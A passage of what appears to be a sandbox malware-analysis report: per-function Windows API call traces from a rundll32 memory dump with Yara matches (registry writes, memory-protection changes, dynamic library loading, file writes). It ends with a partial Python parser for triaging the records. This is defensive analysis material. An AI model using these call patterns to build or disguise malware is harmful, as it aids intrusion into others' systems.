                                • Part of subcall function 0593A316: _allmul.NTDLL(?,?,FFFFD8F0,000000FF), ref: 0593A3CD
                                • Part of subcall function 0593A316: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,FFFFD8F0,000000FF), ref: 0593A405
                                • Part of subcall function 0593A316: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,FFFFD8F0,000000FF), ref: 0593A427
                                • Part of subcall function 0593A316: GetShellWindow.USER32 ref: 0593A436
                               Similarity
                               • API ID: FileTempTimerWaitable$FreeHeapInterlockedPathTime$CreateCurrentDecrementDeleteIncrementMultipleNameObjectsShellSystemThreadWaitWindow_allmullstrcpy
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 059326E7
                              • memcpy.NTDLL(00000000,?,?,?), ref: 05932710
                              • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,?), ref: 05932739
                              • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,00000000), ref: 05932759
                              • RegCloseKey.ADVAPI32(?), ref: 05932764
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                               Similarity
                               • API ID: Value$AllocateCloseCreateHeapmemcpy
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(0593980C,?,?,?,?,00000008,0593980C,00000000,?), ref: 0593E59A
                              • memcpy.NTDLL(0593980C,?,00000009,?,?,?,?,00000008,0593980C,00000000,?), ref: 0593E5BC
                              • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 0593E5D4
                              • lstrlenW.KERNEL32(00000000,00000001,0593980C,?,?,?,?,?,?,?,00000008,0593980C,00000000,?), ref: 0593E5F4
                              • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00000008,0593980C,00000000,?), ref: 0593E619
                               Similarity
                               • API ID: HeapTime$AllocateFileFreeSystemlstrlenmemcpy
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrcmpi.KERNEL32(00000000,?), ref: 0594FEC3
                              • RtlEnterCriticalSection.NTDLL(0595A428), ref: 0594FED0
                              • RtlLeaveCriticalSection.NTDLL(0595A428), ref: 0594FEE3
                              • lstrcmpi.KERNEL32(0595A440,00000000), ref: 0594FF03
                              • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0593404D,00000000), ref: 0594FF17
                               Similarity
                               • API ID: CriticalSectionTimelstrcmpi$EnterFileLeaveSystem
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(?,00000000,05953716,00000000,05942466,?,?,?,05948A07,?,?,?,00000000,00000001,00000000,?), ref: 0593326D
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • lstrcpy.KERNEL32(00000000,?), ref: 05933291
                              • StrRChrA.SHLWAPI(?,00000000,0000002E,?,00000003,?,?,05948A07,?,?,?,00000000,00000001,00000000,?,00000000), ref: 05933298
                              • lstrcpy.KERNEL32(00000000,?), ref: 059332E0
                              • lstrcat.KERNEL32(00000000,?), ref: 059332EF
                               Similarity
                               • API ID: lstrcpy$AllocateHeaplstrcatlstrlen
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 0594D580: lstrlen.KERNEL32(00000000,00000000,?,00000000,0593243E,00000000,00000000,00000000,00000000,?,00000022,00000000,00000000,00000000,?,?), ref: 0594D58C
                              • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0594E3F6
                              • memcpy.NTDLL(00000000,?,?), ref: 0594E409
                              • RtlEnterCriticalSection.NTDLL(0595A428), ref: 0594E41A
                              • RtlLeaveCriticalSection.NTDLL(0595A428), ref: 0594E42F
                              • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0594E467
                               Similarity
                               • API ID: CriticalHeapSection$AllocateEnterFreeLeavelstrlenmemcpy
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(0593C1F8,00000000,00000000,00000000,?,05940FD9,?,0593C1F8,00000000), ref: 05944D2D
                              • lstrlen.KERNEL32(?,?,05940FD9,?,0593C1F8,00000000), ref: 05944D34
                              • RtlAllocateHeap.NTDLL(00000000,00000029), ref: 05944D42
                                • Part of subcall function 0593EEF2: GetLocalTime.KERNEL32(?,?,?,?,0594FC9E,00000000,00000001), ref: 0593EEFC
                                • Part of subcall function 0593EEF2: wsprintfA.USER32 ref: 0593EF2F
                              • wsprintfA.USER32 ref: 05944D64
                                • Part of subcall function 0593ED48: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,05944D8C,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 0593ED66
                                • Part of subcall function 0593ED48: wsprintfA.USER32 ref: 0593ED8B
                              • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 05944D95
                               Similarity
                               • API ID: wsprintf$HeapTimelstrlen$AllocateFreeLocalSystem
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • ResetEvent.KERNEL32(?,00000008,00000000,0000EA60,00000000,00000000,00000000,?,0593DBAC,?,?,00000000,05933EC6,?,00000000), ref: 0594DD35
                              • ResetEvent.KERNEL32(?,?,0593DBAC,?,?,00000000,05933EC6,?,00000000), ref: 0594DD3A
                              • GetLastError.KERNEL32(0593DBAC,?,?,00000000,05933EC6,?,00000000), ref: 0594DD55
                              • GetLastError.KERNEL32(0000EA60,00000000,00000000,00000000,?,0593DBAC,?,?,00000000,05933EC6,?,00000000), ref: 0594DD84
                                • Part of subcall function 0593D429: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,0594DD0F,00000000,00000000,00000004,00000000,?,0593DBAC,?,?,00000000), ref: 0593D435
                                • Part of subcall function 0593D429: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0594DD0F,00000000,00000000,00000004,00000000,?,0593DBAC,?), ref: 0593D493
                                • Part of subcall function 0593D429: lstrcpy.KERNEL32(00000000,00000000), ref: 0593D4A3
                              • SetEvent.KERNEL32(?,0593DBAC,?,?,00000000,05933EC6,?,00000000), ref: 0594DD76
                               Similarity
                               • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,00004000,-00000008), ref: 05950AB4
                                • Part of subcall function 0594EC09: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 0594EC20
                                • Part of subcall function 0594EC09: SetEvent.KERNEL32(?,?,?,?,05933EC6,?,?), ref: 0594EC30
                              • lstrlen.KERNEL32(?,?,?,?,?,0593859B,?,?), ref: 05950AD7
                              • lstrlen.KERNEL32(?,?,?,?,0593859B,?,?), ref: 05950AE1
                              • memcpy.NTDLL(?,?,00004000,?,?,0593859B,?,?), ref: 05950AF2
                              • HeapFree.KERNEL32(00000000,?,?,?,?,0593859B,?,?), ref: 05950B14
                               Similarity
                               • API ID: Heaplstrlen$AllocateEventFreeObjectSingleWaitmemcpy
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 0593AE7C: lstrlen.KERNEL32(0593E448,00000000,00000000,?,?,05947A5B,?,?,?,?,0593E448,?), ref: 0593AE8B
                                • Part of subcall function 0593AE7C: mbstowcs.NTDLL ref: 0593AEA7
                              • lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,?,?,0593E448,?), ref: 05947A6A
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 05947A7C
                              • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0593E448,?), ref: 05947A99
                              • lstrlenW.KERNEL32(00000000,?,?,0593E448,?), ref: 05947AA5
                              • HeapFree.KERNEL32(00000000,00000000,?,?,0593E448,?), ref: 05947AB9
                               Similarity
                               • API ID: lstrlen$Heap$AllocateCreateDirectoryFreembstowcs
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetModuleHandleA.KERNEL32 ref: 0593F4BF
                              • GetModuleHandleA.KERNEL32 ref: 0593F4CD
                              • LoadLibraryExW.KERNEL32(?,?,?), ref: 0593F4DA
                              • GetModuleHandleA.KERNEL32 ref: 0593F4F1
                              • GetModuleHandleA.KERNEL32 ref: 0593F4FD
                               Similarity
                               • API ID: HandleModule$LibraryLoad
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • StrChrA.SHLWAPI(00000000,0000003D,00000000,00000000,?,0593396C), ref: 0594BDCC
                              • StrTrimA.SHLWAPI(00000001,?,?,0593396C), ref: 0594BDEF
                              • StrTrimA.SHLWAPI(00000000,?,?,0593396C), ref: 0594BDFE
                              • _strupr.NTDLL ref: 0594BE01
                              • lstrlen.KERNEL32(00000000,0593396C), ref: 0594BE09
                               Similarity
                               • API ID: Trim$_struprlstrlen
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlEnterCriticalSection.NTDLL(0595A400), ref: 05951664
                              • RtlLeaveCriticalSection.NTDLL(0595A400), ref: 05951675
                              • VirtualProtect.KERNEL32(?,00000004,00000040,0000007F,?,?,05944B8B,?,?,0595A428,059325BA,00000003), ref: 0595168C
                              • VirtualProtect.KERNEL32(?,00000004,0000007F,0000007F,?,?,05944B8B,?,?,0595A428,059325BA,00000003), ref: 059516A6
                              • GetLastError.KERNEL32(?,?,05944B8B,?,?,0595A428,059325BA,00000003), ref: 059516B3
                               Similarity
                               • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,05942397,?), ref: 05940820
                              • GetVersion.KERNEL32 ref: 0594082F
                              • GetCurrentProcessId.KERNEL32 ref: 0594084B
                              • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 05940868
                              • GetLastError.KERNEL32 ref: 05940887
                               Similarity
                               • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetCurrentThreadId.KERNEL32 ref: 059389FB
                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000040,?,?,?,?,?,?,00000000,?), ref: 05938A0B
                              • CloseHandle.KERNEL32(00000000,?,?,00000040,?,?,?,?,?,?,00000000,?), ref: 05938A14
                              • VirtualFree.KERNEL32(?,00000000,00008000,?,?,05942F34,?,?,00000040,?,?,?,?,?,?,00000000), ref: 05938A32
                              • VirtualFree.KERNEL32(?,00000000,00008000,?,?,05942F34,?,?,00000040,?,?,?,?,?,?,00000000), ref: 05938A3F
                               Similarity
                               • API ID: FreeVirtual$CloseCurrentHandleObjectSingleThreadWait
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(?,00000000,00000000,?,?,?,?,?), ref: 0594C4A8
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • wsprintfA.USER32 ref: 0594C4D9
                                • Part of subcall function 0593AAAF: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,00000030,?,?,?,?,?,?,?,?,?,?,?,0593A1A1), ref: 0593AAC5
                                • Part of subcall function 0593AAAF: wsprintfA.USER32 ref: 0593AAED
                                • Part of subcall function 0593AAAF: lstrlen.KERNEL32(?), ref: 0593AAFC
                                • Part of subcall function 0593AAAF: wsprintfA.USER32 ref: 0593AB3C
                                • Part of subcall function 0593AAAF: wsprintfA.USER32 ref: 0593AB71
                                • Part of subcall function 0593AAAF: memcpy.NTDLL(00000000,?,?), ref: 0593AB7E
                                • Part of subcall function 0593AAAF: memcpy.NTDLL(00000008,059553E8,00000002,00000000,?,?), ref: 0593AB93
                                • Part of subcall function 0593AAAF: wsprintfA.USER32 ref: 0593ABB6
                              • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0594C54E
                                • Part of subcall function 05952968: RtlEnterCriticalSection.NTDLL(05F3C2D0), ref: 0595297E
                                • Part of subcall function 05952968: RtlLeaveCriticalSection.NTDLL(05F3C2D0), ref: 05952999
                              • HeapFree.KERNEL32(00000000,?,?,?,00000001,?,?,?,?,00000000,00000000,?,?,?), ref: 0594C538
                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 0594C544
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: wsprintf$Heap$Free$CriticalSectionTimelstrlenmemcpy$AllocateEnterFileLeaveSystem
                              • String ID:
                              • API String ID: 3553201432-0
                              • Opcode ID: 71f8417467193469d6a576296c21f7ddae0bdb3df2dea4056e7a57325b775a98
                              • Instruction ID: 511a1ab6aed2d5526752d429a7f1c784c7f2dc573a04789055dc17cdb791e3e8
                              • Opcode Fuzzy Hash: 71f8417467193469d6a576296c21f7ddae0bdb3df2dea4056e7a57325b775a98
                              • Instruction Fuzzy Hash: DB212672914249EFCF11DFA9DD89D9FBFBAFB88310B004426F905A6110D7719A24DFA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • HeapFree.KERNEL32(00000000,?), ref: 0593EFBC
                              • HeapFree.KERNEL32(00000000,?), ref: 0593EFCD
                              • HeapFree.KERNEL32(00000000,?), ref: 0593EFE5
                              • CloseHandle.KERNEL32(?), ref: 0593EFFF
                              • HeapFree.KERNEL32(00000000,?), ref: 0593F014
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: FreeHeap$CloseHandle
                              • String ID:
                              • API String ID: 1910495013-0
                              • Opcode ID: c4258cc831cf2c01bd81b2f2f656fff2263c704d99a9dacd39f5f6eca684a406
                              • Instruction ID: 5285666f3cff36aefefdf829c6a0656e47d2ea2a514d83338194887359830613
                              • Opcode Fuzzy Hash: c4258cc831cf2c01bd81b2f2f656fff2263c704d99a9dacd39f5f6eca684a406
                              • Instruction Fuzzy Hash: 2A21F571619621EFC3219B65DC89C2AFBAEFF49B113540514F40AD3650C731ECA1DB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 0593EC00: RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,00000001), ref: 0593EC1B
                                • Part of subcall function 0593EC00: LoadLibraryA.KERNEL32(00000000,?,00000008,?,00000001), ref: 0593EC69
                                • Part of subcall function 0593EC00: GetProcAddress.KERNEL32(00000000,?), ref: 0593EC82
                                • Part of subcall function 0593EC00: RegCloseKey.ADVAPI32(00000001,?,00000008,?,00000001), ref: 0593ECD3
                              • GetLastError.KERNEL32(?,?,00000001), ref: 0594987C
                              • FreeLibrary.KERNEL32(?,?,00000001), ref: 059498E4
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Library$AddressCloseErrorFreeLastLoadOpenProc
                              • String ID:
                              • API String ID: 1730969706-0
                              • Opcode ID: 066736a1f7f3a64cf8cc02e565e788b555526f8d24bb5422cb22c9664ff5f590
                              • Instruction ID: c76f0956af95ded1c54c4799a529bbbf166771e721440b6eabe1ac27f8698ede
                              • Opcode Fuzzy Hash: 066736a1f7f3a64cf8cc02e565e788b555526f8d24bb5422cb22c9664ff5f590
                              • Instruction Fuzzy Hash: FF71B2B5E00209EFCF10DFE9C888DAEBBB9BF48314B1485A9E516A7251D735AD41CF60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(?,00000008,0000EA60,?,?,?,0594DD27,00000000,0000EA60,00000000,00000000,00000000,?,0593DBAC,?,?), ref: 05952E89
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • ResetEvent.KERNEL32(?,?,?,?,0594DD27,00000000,0000EA60,00000000,00000000,00000000,?,0593DBAC,?,?,00000000,05933EC6), ref: 05952F00
                              • GetLastError.KERNEL32(?,?,?,0594DD27,00000000,0000EA60,00000000,00000000,00000000,?,0593DBAC,?,?,00000000,05933EC6,?), ref: 05952F2D
                                • Part of subcall function 0594E803: RtlFreeHeap.NTDLL(00000000,?,05943953,?,?,0594BF5B,00000000,00000000,059310B0,00000000,05959F2C,00000008,00000003), ref: 0594E80F
                              • GetLastError.KERNEL32(?,?,?,0594DD27,00000000,0000EA60,00000000,00000000,00000000,?,0593DBAC,?,?,00000000,05933EC6,?), ref: 05952FEF
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                              • String ID:
                              • API String ID: 943265810-0
                              • Opcode ID: a90f6aa440133ae7b2c94dd01e8e2466154c3806c6fcc2057ce025621aa2d70a
                              • Instruction ID: e5f61c8ba3c7b15985aa0b3d29f23590241ec0cf74f92489f24010802f8c23f3
                              • Opcode Fuzzy Hash: a90f6aa440133ae7b2c94dd01e8e2466154c3806c6fcc2057ce025621aa2d70a
                              • Instruction Fuzzy Hash: A64160B6604304BFEB219FA0DC89EBB7BADFB44714F044939F902D6190EB709964DB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 05944E5C
                              • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 05944E72
                              • memset.NTDLL ref: 05944F1B
                              • memset.NTDLL ref: 05944F31
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: memset$_allmul_aulldiv
                              • String ID:
                              • API String ID: 3041852380-0
                              • Opcode ID: 1b7e23a9f15f9a6444f891b6d52947f971d0eb2120b8df05a5ccda525e6630e0
                              • Instruction ID: 3ac2d42bcd5d79bbc0404f7ebd19a4ed6c396bba78df998c39015d1a41e80d38
                              • Opcode Fuzzy Hash: 1b7e23a9f15f9a6444f891b6d52947f971d0eb2120b8df05a5ccda525e6630e0
                              • Instruction Fuzzy Hash: 40418A31B00219AFDF10DF68DC85FEE77A9EB85710F108569E81AA7280DB70AE558F91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • ResetEvent.KERNEL32(?,00000000,00000000,00000000,05933EC6,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 0594C7D5
                              • GetLastError.KERNEL32(?,?,?,05933EC6,?,?), ref: 0594C7EE
                              • ResetEvent.KERNEL32(?,?,?,?,05933EC6,?,?), ref: 0594C867
                              • GetLastError.KERNEL32(?,?,?,05933EC6,?,?), ref: 0594C882
                                • Part of subcall function 0594EC09: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 0594EC20
                                • Part of subcall function 0594EC09: SetEvent.KERNEL32(?,?,?,?,05933EC6,?,?), ref: 0594EC30
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Event$ErrorLastReset$ObjectSingleWait
                              • String ID:
                              • API String ID: 1123145548-0
                              • Opcode ID: 5fa4864f2d2b0a1c31233340ca5b72f26cf38bc1ab777e17b2fbd8fe5abb21b7
                              • Instruction ID: 69a4f22adb33ccedeb3bc5622de6e5f88916b7d47cc480c18428de4643c852b1
                              • Opcode Fuzzy Hash: 5fa4864f2d2b0a1c31233340ca5b72f26cf38bc1ab777e17b2fbd8fe5abb21b7
                              • Instruction Fuzzy Hash: 8741A232A00204EFDB219BA4CC44EAEB7BABF88360F150565F516D7290EB74ED41DF50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • StrRChrA.SHLWAPI(?,00000000,00000023,?), ref: 05949A93
                              • StrChrA.SHLWAPI(?,0000005C), ref: 05949ABA
                              • lstrcpyn.KERNEL32(00000005,?,00000001,00000001), ref: 05949AE0
                              • lstrcpy.KERNEL32(?,?), ref: 05949B84
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrcpyn
                              • String ID:
                              • API String ID: 4154805583-0
                              • Opcode ID: 22d374f893e70eb0fa473d7e1e30a30d99d089a13bcaf4cbd577384248e2e25e
                              • Instruction ID: e3aba28289229c3b7f9681e359ec3fc1b76adbf02d291cf2ca825cdf1dd480e6
                              • Opcode Fuzzy Hash: 22d374f893e70eb0fa473d7e1e30a30d99d089a13bcaf4cbd577384248e2e25e
                              • Instruction Fuzzy Hash: CE412976904219BFEB11DBA4CC88DEFBBBCAF49250F0445A6F905E7141DA349E58CFA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: _strupr
                              • String ID:
                              • API String ID: 3408778250-0
                              • Opcode ID: 1296071d3fb27551d713eb8a04562c1f7f8abefc86680e28b11ad92d27591936
                              • Instruction ID: 4313a64806861b110be1d2958f59645f4b1de7285a9cd3438f35ade457b9dc08
                              • Opcode Fuzzy Hash: 1296071d3fb27551d713eb8a04562c1f7f8abefc86680e28b11ad92d27591936
                              • Instruction Fuzzy Hash: CD41EB729042099BEF21DF78D88CEEFB7ADBF45250F208426EC25D6160D778E965CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 05939D46: GetSystemTimeAsFileTime.KERNEL32(?,?,00000000), ref: 05939D54
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 059348C0
                              • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05934911
                                • Part of subcall function 0593F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 0593F3DB
                                • Part of subcall function 0593F39B: GetLastError.KERNEL32 ref: 0593F3E5
                                • Part of subcall function 0593F39B: WaitForSingleObject.KERNEL32(000000C8), ref: 0593F40A
                                • Part of subcall function 0593F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 0593F42D
                                • Part of subcall function 0593F39B: SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 0593F455
                                • Part of subcall function 0593F39B: WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 0593F46A
                                • Part of subcall function 0593F39B: SetEndOfFile.KERNEL32(00001000), ref: 0593F477
                                • Part of subcall function 0593F39B: CloseHandle.KERNEL32(00001000), ref: 0593F48F
                              • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000101,?,00000000,?,?,?,00000000,?,00000001), ref: 05934946
                              • HeapFree.KERNEL32(00000000,?,?,00000000,?,00000001), ref: 05934956
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Heap$AllocateCreateFreeTime$CloseErrorHandleLastObjectPointerSingleSystemWaitWrite
                              • String ID:
                              • API String ID: 4200334623-0
                              • Opcode ID: f96dda902787bdba5e0ab832b5ff190b497fdf2fcf616355e85fe3f78fdce2fd
                              • Instruction ID: 50183841977f84b36fc78653d30728d9ff1d4ef7f9d23a005b4f461446dd144c
                              • Opcode Fuzzy Hash: f96dda902787bdba5e0ab832b5ff190b497fdf2fcf616355e85fe3f78fdce2fd
                              • Instruction Fuzzy Hash: 37312876510119FFDB009FA4CC8ACAEBFBDFB09250B110065F605D3210EB71AE649BA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 0594EC20
                              • SetEvent.KERNEL32(?,?,?,?,05933EC6,?,?), ref: 0594EC30
                              • GetLastError.KERNEL32 ref: 0594ECB9
                                • Part of subcall function 0594F197: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00000000,?,?,?,05952F4B,0000EA60,?,?,?,0594DD27,00000000,0000EA60,00000000), ref: 0594F1B2
                                • Part of subcall function 0594E803: RtlFreeHeap.NTDLL(00000000,?,05943953,?,?,0594BF5B,00000000,00000000,059310B0,00000000,05959F2C,00000008,00000003), ref: 0594E80F
                              • GetLastError.KERNEL32(00000000), ref: 0594ECEE
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                              • String ID:
                              • API String ID: 602384898-0
                              • Opcode ID: e050268ecd2fbc224c26e2dfa18a92b15e31ae01958be9d2e0ed84581806a289
                              • Instruction ID: 34e0e1452fe21b98a54d3391d918d0866cc2f6cdffe01bc419d7efc6c338b315
                              • Opcode Fuzzy Hash: e050268ecd2fbc224c26e2dfa18a92b15e31ae01958be9d2e0ed84581806a289
                              • Instruction Fuzzy Hash: 3831FCB5904309EFDB20DFA5C884DAEBBBCFF08209F14496AE502A2241D771AE44DF51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0594A8C1
                              • memcpy.NTDLL(00000018,?,?), ref: 0594A8EA
                              • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_0000BEC1,00000000,000000FF,00000008), ref: 0594A929
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0594A93C
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateFreeObjectRegisterSingleWaitmemcpy
                              • String ID:
                              • API String ID: 2780211928-0
                              • Opcode ID: 6e53c6c5f608e3ebf70a0e8f954e6951ddff78c655d4ab776b7d51a9ee02d5a9
                              • Instruction ID: 95df3314035609a3195fee6e69b6c9671f0074befc7744d4ac3e785c35eb26a5
                              • Opcode Fuzzy Hash: 6e53c6c5f608e3ebf70a0e8f954e6951ddff78c655d4ab776b7d51a9ee02d5a9
                              • Instruction Fuzzy Hash: 45314B70245305AFDB208F24DC45E9EBBA9FF09321F014129F95AD62A0DB70ED25DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%
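The per-function records above (the `APIs` / `Similarity` / `Uniqueness` blocks emitted by the Joe Sandbox IDA plugin) are easier to triage once parsed than read one by one. The following parser is an added example, not part of the Joe Sandbox report or its tooling; it assumes only the record layout visible on this page, and its sample input is three records copied from the report (the `Software\Microsoft\WAB\DLLPath` lookup, the `RegisterWaitForSingleObject` registration with the `Function_0000BEC1` callback, and the `_allmul`/`_aulldiv` helper). It separates direct calls from `Part of subcall function` entries, keeps each call's `ref` address, pulls out the arguments that are neither unknown (`?`) nor 8-digit hex immediates (these are the strings and symbols the decompiler recovered, which are the pivots an analyst actually wants), and builds a per-module API histogram.

```python
import re
from collections import Counter

# Constructed sample input: three function records copied from the Joe Sandbox
# report above. Meta lines not needed for the demo were dropped.
SAMPLE = r"""
APIs
  • Part of subcall function 0593EC00: RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,00000001), ref: 0593EC1B
  • Part of subcall function 0593EC00: LoadLibraryA.KERNEL32(00000000,?,00000008,?,00000001), ref: 0593EC69
  • Part of subcall function 0593EC00: GetProcAddress.KERNEL32(00000000,?), ref: 0593EC82
  • Part of subcall function 0593EC00: RegCloseKey.ADVAPI32(00000001,?,00000008,?,00000001), ref: 0593ECD3
• GetLastError.KERNEL32(?,?,00000001), ref: 0594987C
• FreeLibrary.KERNEL32(?,?,00000001), ref: 059498E4
Memory Dump Source
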